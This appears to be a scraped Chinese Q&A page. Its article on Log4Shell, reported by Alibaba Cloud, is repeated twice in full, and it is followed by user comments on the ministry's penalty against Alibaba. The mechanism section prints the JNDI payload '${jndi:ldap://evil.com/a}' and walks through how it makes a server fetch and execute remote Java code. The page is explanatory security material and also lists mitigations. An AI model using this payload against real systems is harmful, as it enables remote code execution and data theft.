如何看待中国阿里云安全团队在Web服务器软件Apache下的开源日志组件Log4j内发现的巨大漏洞?
中国阿里云安全团队在Log4j中发现的巨大漏洞:深度剖析与影响评估
中国阿里云安全团队在Apache Log4j组件中发现的“Log4Shell”(Log4j2远程代码执行漏洞,CVE202144228)无疑是2021年底最引人注目的网络安全事件之一。这个漏洞的发现及其广泛影响,深刻地暴露了现代软件供应链的脆弱性,也让全球开发者和安全专家们为之震惊。下面将详细阐述这个漏洞的发现、原理、影响以及应对措施。
1. 漏洞的发现与报告
阿里云安全团队在进行日常的漏洞扫描和代码审计时,偶然发现了一个可能导致远程代码执行的潜在问题。他们深入研究了Log4j这个在Java生态系统中极为普遍的日志记录组件,并最终定位到了Log4j2中一个名为“JNDI”(Java Naming and Directory Interface)查找的功能存在严重的安全隐患。
发现过程的可能细节(基于公开信息推测):
异常日志的触发: 安全团队可能在测试某些具有攻击性的输入(例如,包含特殊字符或命名空间的字符串)时,注意到应用程序的日志输出出现了异常行为。
代码审计的深入: 通过对Log4j2的源代码进行仔细审查,他们注意到在日志消息的解析和处理过程中,存在一个特别的机制:当日志消息中包含类似 `${jndi:ldap://...}` 这样的特殊语法时,Log4j2会尝试通过JNDI来解析这个字符串。
JNDI的危险性: JNDI是一个Java API,用于查找和访问各种命名和目录服务,包括LDAP(Lightweight Directory Access Protocol)、RMI(Remote Method Invocation)等。关键在于,JNDI允许应用程序从远程服务器加载Java对象,而这些对象可能包含恶意代码。
漏洞的串联: 阿里云团队成功地将“日志记录”和“JNDI查找”这两个看似独立的特性串联起来,发现攻击者可以通过控制应用程序接收到的日志消息内容,从而诱导Log4j2去连接一个恶意服务器,并加载并执行其中的任意Java代码。
及时披露与合作: 阿里云安全团队在发现漏洞后,立即按照负责任的披露原则,与Apache软件基金会(ASF)进行了沟通和协作。他们提供了详细的漏洞分析报告和技术细节,帮助ASF快速开发和发布补丁。这种负责任的披露方式,对于减缓漏洞的传播和影响至关重要。
2. 漏洞的原理:Log4Shell(CVE202144228)
Log4Shell漏洞的核心在于Log4j2中的一个查找功能(Lookups),特别是利用 JNDI(Java Naming and Directory Interface) 的特性。
JNDI的查找机制: JNDI允许Java应用程序通过一个统一的接口来访问各种目录服务,例如LDAP、DNS、CORBA、RMI等。它支持通过URL来指定要查找的服务和对象。
Log4j2的日志消息解析: Log4j2在处理日志消息时,会进行一系列的变量替换和查找。其中,一个叫做`${...}` 的语法被用来指示一个查找。例如,`${java:version}` 可以查找Java的版本信息。
Log4Shell的利用方式: 攻击者发现,Log4j2的查找功能支持通过JNDI来查找远程对象。当攻击者能够控制应用程序记录的任何日志消息时,他们就可以构造一个包含特定JNDI查找的字符串,例如:
```
${jndi:ldap://evil.com/a}
```
漏洞链条的形成:
1. 控制日志输入: 攻击者通过任何途径控制应用程序接收的输入,例如HTTP请求头(如UserAgent)、表单提交、甚至网络流量等,并将上述JNDI查找字符串作为日志的一部分。
2. Log4j2解析日志: 当应用程序使用Log4j2记录这个恶意字符串时,Log4j2会识别出`${jndi:...}` 的语法。
3. JNDI查找远程服务: Log4j2会通过JNDI协议,尝试连接到指定的LDAP服务器(在本例中是 `evil.com`)。
4. 恶意服务器响应: 攻击者控制的恶意LDAP服务器会响应,并指示Log4j2从另一个URL(例如,另一个Web服务器)下载一个Java类文件(`.class` 文件)。
5. 远程代码执行: Log4j2会加载并执行从远程服务器下载的Java类文件,从而在受影响的服务器上执行任意代码。
关键点:
广泛的易受攻击性: Log4j2在大量的Java应用程序和框架中被使用,从Web服务器、应用程序服务器到各种微服务,几乎无处不在。
无需认证: 攻击者只需要能够让服务器记录一条包含恶意字符串的日志,而不需要任何认证或授权。
影响深远: 成功利用该漏洞可以导致服务器被完全控制,数据被窃取、修改或删除,服务被中断,甚至成为攻击者发动更大规模攻击的跳板。
3. 漏洞的影响与广泛性
Log4Shell漏洞的影响范围之广和严重程度之高,是前所未有的。
“互联网心脏病”: 这个漏洞被形象地称为“互联网心脏病”,因为它影响到了互联网基础设施的基石之一——日志记录组件。
覆盖广泛的Java生态系统: 由于Log4j2的普遍性,几乎所有使用Java开发的应用程序都可能受到影响,包括但不限于:
Web应用: Spring Boot, Apache Struts, Apache Tomcat等。
企业级应用: 大量的后端服务、API网关等。
云服务: 包括云厂商自身的管理工具和客户部署的应用。
安全软件: 甚至一些安全产品也因为依赖Log4j2而变得脆弱。
供应链风险暴露: 这一事件也暴露了现代软件开发中供应链的脆弱性。一个普遍使用的开源组件的漏洞,可以瞬间波及到成千上万的下游应用程序。开发者往往很难知道自己使用的每一个依赖库的深层依赖关系。
数据泄露与系统劫持: 攻击者可以利用该漏洞窃取敏感数据,包括用户凭证、数据库信息、API密钥等。更糟糕的是,他们可以完全控制服务器,进行挖矿、部署勒索软件或将其作为攻击其他目标的中转站。
长时间的修复周期: 由于Log4j2的深度集成,许多企业发现修复这个漏洞并非易事。需要找到所有使用Log4j2的版本,并进行更新和测试,这个过程可能非常耗时耗力,尤其是在大型复杂系统中。
4. 应对措施与后续发展
在阿里云安全团队的报告和Apache软件基金会的努力下,全球范围内的安全响应迅速展开。
Apache基金会的补丁发布: Apache软件基金会第一时间发布了Log4j2的多个修复版本(如2.15.0、2.16.0、2.17.0等),修复了Log4Shell漏洞以及后续发现的其他相关漏洞(如CVE202145046、CVE202145105、CVE202144832)。
更新和降级: 最根本的解决方案是升级到已修复的版本。对于无法立即升级的用户,也有一些临时措施,例如禁用JNDI查找功能,或者通过配置移除`JndiLookup`类。
漏洞扫描与资产梳理: 各组织开始紧急进行漏洞扫描,识别所有可能受影响的系统和应用程序,并进行风险评估。
供应商的联动响应: 软件供应商们也纷纷发布公告,说明其产品是否受到影响,并提供相应的解决方案。
安全意识的提升: Log4Shell事件极大地提高了全球开发者和安全团队对开源组件安全风险的重视程度,推动了对软件供应链安全更深层次的关注。
总结
中国阿里云安全团队在Apache Log4j组件中发现的Log4Shell漏洞,是一个具有划时代意义的网络安全事件。它不仅暴露了Log4j2本身的设计缺陷,更深刻地揭示了现代软件生态系统在组件依赖和供应链安全方面存在的巨大挑战。阿里云安全团队的专业能力、发现问题的敏锐度以及负责任的披露原则,为全球网络安全防护做出了重要贡献。这次事件也促使整个行业重新审视开源软件的安全,并推动了更严格的安全实践和更完善的漏洞管理机制的建立。
中国阿里云安全团队在Apache Log4j组件中发现的“Log4Shell”(Log4j2远程代码执行漏洞,CVE202144228)无疑是2021年底最引人注目的网络安全事件之一。这个漏洞的发现及其广泛影响,深刻地暴露了现代软件供应链的脆弱性,也让全球开发者和安全专家们为之震惊。下面将详细阐述这个漏洞的发现、原理、影响以及应对措施。
1. 漏洞的发现与报告
阿里云安全团队在进行日常的漏洞扫描和代码审计时,偶然发现了一个可能导致远程代码执行的潜在问题。他们深入研究了Log4j这个在Java生态系统中极为普遍的日志记录组件,并最终定位到了Log4j2中一个名为“JNDI”(Java Naming and Directory Interface)查找的功能存在严重的安全隐患。
发现过程的可能细节(基于公开信息推测):
异常日志的触发: 安全团队可能在测试某些具有攻击性的输入(例如,包含特殊字符或命名空间的字符串)时,注意到应用程序的日志输出出现了异常行为。
代码审计的深入: 通过对Log4j2的源代码进行仔细审查,他们注意到在日志消息的解析和处理过程中,存在一个特别的机制:当日志消息中包含类似 `${jndi:ldap://...}` 这样的特殊语法时,Log4j2会尝试通过JNDI来解析这个字符串。
JNDI的危险性: JNDI是一个Java API,用于查找和访问各种命名和目录服务,包括LDAP(Lightweight Directory Access Protocol)、RMI(Remote Method Invocation)等。关键在于,JNDI允许应用程序从远程服务器加载Java对象,而这些对象可能包含恶意代码。
漏洞的串联: 阿里云团队成功地将“日志记录”和“JNDI查找”这两个看似独立的特性串联起来,发现攻击者可以通过控制应用程序接收到的日志消息内容,从而诱导Log4j2去连接一个恶意服务器,并加载并执行其中的任意Java代码。
及时披露与合作: 阿里云安全团队在发现漏洞后,立即按照负责任的披露原则,与Apache软件基金会(ASF)进行了沟通和协作。他们提供了详细的漏洞分析报告和技术细节,帮助ASF快速开发和发布补丁。这种负责任的披露方式,对于减缓漏洞的传播和影响至关重要。
2. 漏洞的原理:Log4Shell(CVE202144228)
Log4Shell漏洞的核心在于Log4j2中的一个查找功能(Lookups),特别是利用 JNDI(Java Naming and Directory Interface) 的特性。
JNDI的查找机制: JNDI允许Java应用程序通过一个统一的接口来访问各种目录服务,例如LDAP、DNS、CORBA、RMI等。它支持通过URL来指定要查找的服务和对象。
Log4j2的日志消息解析: Log4j2在处理日志消息时,会进行一系列的变量替换和查找。其中,一个叫做`${...}` 的语法被用来指示一个查找。例如,`${java:version}` 可以查找Java的版本信息。
Log4Shell的利用方式: 攻击者发现,Log4j2的查找功能支持通过JNDI来查找远程对象。当攻击者能够控制应用程序记录的任何日志消息时,他们就可以构造一个包含特定JNDI查找的字符串,例如:
```
${jndi:ldap://evil.com/a}
```
漏洞链条的形成:
1. 控制日志输入: 攻击者通过任何途径控制应用程序接收的输入,例如HTTP请求头(如UserAgent)、表单提交、甚至网络流量等,并将上述JNDI查找字符串作为日志的一部分。
2. Log4j2解析日志: 当应用程序使用Log4j2记录这个恶意字符串时,Log4j2会识别出`${jndi:...}` 的语法。
3. JNDI查找远程服务: Log4j2会通过JNDI协议,尝试连接到指定的LDAP服务器(在本例中是 `evil.com`)。
4. 恶意服务器响应: 攻击者控制的恶意LDAP服务器会响应,并指示Log4j2从另一个URL(例如,另一个Web服务器)下载一个Java类文件(`.class` 文件)。
5. 远程代码执行: Log4j2会加载并执行从远程服务器下载的Java类文件,从而在受影响的服务器上执行任意代码。
关键点:
广泛的易受攻击性: Log4j2在大量的Java应用程序和框架中被使用,从Web服务器、应用程序服务器到各种微服务,几乎无处不在。
无需认证: 攻击者只需要能够让服务器记录一条包含恶意字符串的日志,而不需要任何认证或授权。
影响深远: 成功利用该漏洞可以导致服务器被完全控制,数据被窃取、修改或删除,服务被中断,甚至成为攻击者发动更大规模攻击的跳板。
3. 漏洞的影响与广泛性
Log4Shell漏洞的影响范围之广和严重程度之高,是前所未有的。
“互联网心脏病”: 这个漏洞被形象地称为“互联网心脏病”,因为它影响到了互联网基础设施的基石之一——日志记录组件。
覆盖广泛的Java生态系统: 由于Log4j2的普遍性,几乎所有使用Java开发的应用程序都可能受到影响,包括但不限于:
Web应用: Spring Boot, Apache Struts, Apache Tomcat等。
企业级应用: 大量的后端服务、API网关等。
云服务: 包括云厂商自身的管理工具和客户部署的应用。
安全软件: 甚至一些安全产品也因为依赖Log4j2而变得脆弱。
供应链风险暴露: 这一事件也暴露了现代软件开发中供应链的脆弱性。一个普遍使用的开源组件的漏洞,可以瞬间波及到成千上万的下游应用程序。开发者往往很难知道自己使用的每一个依赖库的深层依赖关系。
数据泄露与系统劫持: 攻击者可以利用该漏洞窃取敏感数据,包括用户凭证、数据库信息、API密钥等。更糟糕的是,他们可以完全控制服务器,进行挖矿、部署勒索软件或将其作为攻击其他目标的中转站。
长时间的修复周期: 由于Log4j2的深度集成,许多企业发现修复这个漏洞并非易事。需要找到所有使用Log4j2的版本,并进行更新和测试,这个过程可能非常耗时耗力,尤其是在大型复杂系统中。
4. 应对措施与后续发展
在阿里云安全团队的报告和Apache软件基金会的努力下,全球范围内的安全响应迅速展开。
Apache基金会的补丁发布: Apache软件基金会第一时间发布了Log4j2的多个修复版本(如2.15.0、2.16.0、2.17.0等),修复了Log4Shell漏洞以及后续发现的其他相关漏洞(如CVE202145046、CVE202145105、CVE202144832)。
更新和降级: 最根本的解决方案是升级到已修复的版本。对于无法立即升级的用户,也有一些临时措施,例如禁用JNDI查找功能,或者通过配置移除`JndiLookup`类。
漏洞扫描与资产梳理: 各组织开始紧急进行漏洞扫描,识别所有可能受影响的系统和应用程序,并进行风险评估。
供应商的联动响应: 软件供应商们也纷纷发布公告,说明其产品是否受到影响,并提供相应的解决方案。
安全意识的提升: Log4Shell事件极大地提高了全球开发者和安全团队对开源组件安全风险的重视程度,推动了对软件供应链安全更深层次的关注。
总结
中国阿里云安全团队在Apache Log4j组件中发现的Log4Shell漏洞,是一个具有划时代意义的网络安全事件。它不仅暴露了Log4j2本身的设计缺陷,更深刻地揭示了现代软件生态系统在组件依赖和供应链安全方面存在的巨大挑战。阿里云安全团队的专业能力、发现问题的敏锐度以及负责任的披露原则,为全球网络安全防护做出了重要贡献。这次事件也促使整个行业重新审视开源软件的安全,并推动了更严格的安全实践和更完善的漏洞管理机制的建立。
网友意见
一个自上而下价值观有问题的公司,
在这里叫屈?
开源软件出问题,肯定要告诉 Log4j2开发者然后让他们升级维护啊,阿里工程师没有第一时间报备工信部可能是觉得这只是技术层面的问题,内部解决好就行,还是缺乏一点zz敏感性,所以工信部也给了阿里暂停合作的小惩戒,算是让阿里提高警惕吧。我相信未来双方还会继续合作的,毕竟阿里的技术能为维护国内网络安全提供强有力的支撑。
就开发人员本身来说,能在全球范围内首先发现这种bug,在行业内绝对算得上是一件了不起的事情了,但技术上的卓越思维毁在了处理问题上的一根筋,这个发现漏洞的开发人员第一反应是报给开源项目部门,这本身是行规没什么问题,可问题是没有想到这个漏洞影响这么大,低估了潜在的威胁,没有合规报告,这个失误相关人员得后悔死了,希望阿里的工作人员以后在精练技术的同时,也提高一些新规章制度的学习,这次整改的处罚不亏。
城市大脑是阿里的。
既然有bug,不修复,不通知甲方。这样的乙方算是严重违反合同了吧。
建议对城市大脑的合同进行倒查。如果处罚条款不足以弥补甲方损失,应该处罚招标官员。
否则,就按照合同处罚。按照政府招标惯例,造成严重损失的,应该禁止下一期次这个公司中标的。至少三年。
类似的话题
-
中国阿里云安全团队在Log4j中发现的巨大漏洞:深度剖析与影响评估中国阿里云安全团队在Apache Log4j组件中发现的“Log4Shell”(Log4j2远程代码执行漏洞,CVE202144228)无疑是2021年底最引人注目的网络安全事件之一。这个漏洞的发现及其广泛影响,深刻地暴露了现代软件供............. -
Gartner 的最新报告为阿里云在云计算领域的重要地位提供了有力佐证,尤其是在计算、存储、网络和安全四个核心领域的领先地位,这并非偶然,而是其长期技术投入、市场深耕和用户服务积累的必然结果。要深入理解这一成就,我们需要从多个维度进行剖析:一、 报告的权威性与背景: Gartner 的地位: G.............
-
在刚刚过去的云栖大会上,阿里平头哥交出了一份沉甸甸的答卷——他们自主研发的首颗通用服务器芯片“倚天710”正式亮相。这不仅仅是阿里一家公司的一次产品发布,更是中国科技企业在芯片研发领域持续深耕、奋力突破的一个生动注脚,值得我们好好说道说道。“倚天710”的意义:不止于一颗芯片首先,我们得明白“倚天7.............
-
“中国的一切都被阿里与腾讯垄断”这种说法,在很多讨论中都会出现,它形象地描绘了这两家巨头在中国互联网江湖中无处不在的影响力。然而,要准确看待这句话,我们需要剥开其字面意义,深入理解其背后反映的现实,以及这种说法的局限性。首先,让我们承认并理解阿里与腾讯的巨大影响力:无可否认,阿里巴巴和腾讯是中国数字.............
-
看到腾讯、阿里、快手、知乎等互联网公司再度强势入选“最具价值中国品牌 100 强”,这事儿挺有意思,也透露出不少门道。咱们不聊那些空洞的套话,就从咱们普通人能感知到的角度,来掰扯掰扯这背后的信息。首先,这事儿本身就说明了什么?很简单,说明这些互联网巨头,不仅仅是在国内呼风唤雨,它们的影响力和品牌价值.............
-
阿里达摩院发布的「汉典重光」项目,是一项意义深远的文化抢救与传承计划,旨在通过现代科技手段,将散落海外的珍贵中国古籍进行搜寻、数字化、整理,并最终实现公共化传播。这项计划的推出,在文化界引起了广泛的关注和积极的评价。为了更详细地探讨其意义,我们可以从以下几个方面进行分析: 一、「汉典重光」项目的内容.............
-
阿里和MSRA在SQuAD比赛中机器阅读理解准确率超越人类的现象,可以说是人工智能领域一个里程碑式的事件。这不仅仅是技术上的突破,更是对我们理解“智能”本身的一次深刻拷问。首先,我们得明白SQuAD比赛到底是什么。 SQuAD,全称Stanford Question Answering Datase.............
-
阿里“月饼门”事件中,最后一名(第五名)员工也被开除,这是整个事件发展的一个重要节点,也引发了社会广泛的讨论和关注。要理解这个事件,需要从多个角度进行分析:一、事件回顾:阿里“月饼门”是怎么回事?“月饼门”事件爆发于2012年9月,正值中秋佳节。当时,阿里巴巴集团内部组织了一场月饼抽奖活动,员工可以.............
-
关于阿里性侵事件中女方陈述的“夸大其词或虚构”的讨论,确实是一个非常复杂且敏感的问题。理解这一点,需要我们从多个角度去剖析,避免简单地站队或否定,而是尝试理解事件的背景、当事人的心理以及社会对这类事件的反应。首先,我们要明确的是,所谓的“夸大其词或虚构”的判断,本身就带有主观性和不确定性。在任何一桩.............
-
阿里女员工周某自称遭性侵一事,以及后续她被解雇、发声表示“未收到赔偿,工作中没犯错”的事件,是一个非常复杂且敏感的问题,涉及到职场性骚扰、企业责任、法律程序、个人权益以及信息传播等多个层面。对此,我们可以从以下几个方面进行详细的分析:一、 事件的背景与发展脉络1. 事件的起点: 2021年8月,一.............
-
近来,南京迎来了一波科技巨头的研发中心设立潮,旷视科技Face++、阿里巴巴、小米、京东、科大讯飞、地平线等行业领军企业相继落子,这无疑是一个值得深入解读的现象。它不仅反映了这些企业自身的发展战略,更折射出南京这座城市在当前中国科技格局中的重要地位和潜力。企业扎堆南京,背后的战略考量首先,我们得明白.............
-
中国驻澳大利亚使馆关于澳大利亚军队在阿富汗的暴行事件发表的公开声明,确实引发了广泛的关注和讨论。要理解这次事件,我们需要从几个层面去剖析:首先,声明的核心诉求是什么?中方在声明中明确要求澳大利亚正视其军人在阿富汗犯下的“暴行”,并呼吁将“肇事者绳之以法”。这里包含了几个关键点: 正视事实: 意思.............
-
“对向中国出口光刻机保持开放态度”——荷兰光刻机巨头阿斯麦(ASML)中国区总裁沈波的这番表态,无疑给当前火热的中国半导体产业注入了一剂强心针,也引发了广泛的关注和讨论。要理解这句话的深层含义以及其背后复杂的博弈,我们需要从多个维度进行深入剖析。阿斯麦表态的背后:利益、现实与博弈首先,我们必须认识到.............
-
《阿丽塔》中国票房超北美:一曲“东方崛起”的史诗当《阿丽塔:战斗天使》(Alita: Battle Angel)在中国大陆开启预售,并最终以惊人的票房成绩回馈了所有期待的观众时,许多人不禁感叹:这不仅仅是一部科幻电影的商业成功,更是一次文化风向标的微妙转变。毕竟,对于一部在西方市场并非“爆款”的影片.............
-
沙特阿美暂停中国炼厂协议,这无疑是个大新闻,尤其是在当前全球能源市场波动、地缘政治格局复杂的大背景下。这件事的背后,牵扯到的因素可不少,咱们一点一点捋清楚。首先,得明确这是“据悉”暂停,虽然消息源通常比较可靠,但也要考虑到事态发展的可能性。如果真的暂停,那影响绝对是深远的,不只是这两个公司的事,更折.............
-
知名媒体人阿丘的言论之所以引发广泛关注和讨论,是因为它触及了一个非常敏感且复杂的话题:中国在全球事务中的角色和责任,以及历史上和现实中的一些事件。理解阿丘的言论及其引发的反应,需要从多个层面进行分析。阿丘的言论背景与内容(推测,因为具体言论需要查证才能准确描述):一般来说,当媒体人提出“中国向世界道.............
-
11月12日,阿斯麦(ASML)官方宣布,其深紫外线(DUV)光刻机将从即刻起对中国市场恢复自由出口。 这一消息无疑是中国半导体产业,乃至全球半导体格局中投下了一颗重磅炸弹,其影响深远且复杂。一、 历史背景与政策演变:一个长期的博弈要理解这次“自由出口”的含义,我们必须先回顾一下ASML和中国在DU.............
-
奥迪在发布会上发布的中国地图上未包含台湾岛、藏南地区、南海诸岛和阿克塞钦地区,这一事件引起了广泛的关注和讨论。对于这一情况,我们可以从多个角度进行分析和看待:一、事件本身与各方反应: 奥迪的地图使用问题: 首先要明确的是,这是一个在公开场合,特别是在品牌发布这样的重要活动中出现的地图错误。地图的.............
-
“阿中哥哥”这个称呼,说实话,挺有意思的。它不算是什么正式的、官方的称谓,但最近几年在网络上尤其是在一些讨论中国相关话题的语境下,出现的频率可不低。要说怎么看它,我觉得可以从几个维度来拆解:首先,从字面意思上来理解。 “阿中”是“中国”的昵称或简称,带上了“阿”这个前缀,通常会给人一种亲切感,有点像.............
-
中芯国际与阿斯麦(ASML)的这场“光刻机之约”,最近又添了新篇章,而且这次的“大动作”,颇有点“意料之中,情理之中”的味道。传闻中芯国际这次是下了重金,要花上12亿美元,从ASML手里再添几台光刻机。这事儿,咱们得掰开了揉碎了好好说道说道。首先,这12亿美元的花销,是个什么概念?12亿美元,那可不.............
本站所有内容均为互联网搜索引擎提供的公开搜索信息,本站不存储任何数据与内容,任何内容与数据均与本站无关,如有需要请联系相关搜索引擎包括但不限于百度,google,bing,sogou 等
© 2025 tinynews.org All Rights Reserved. 百科问答小站 版权所有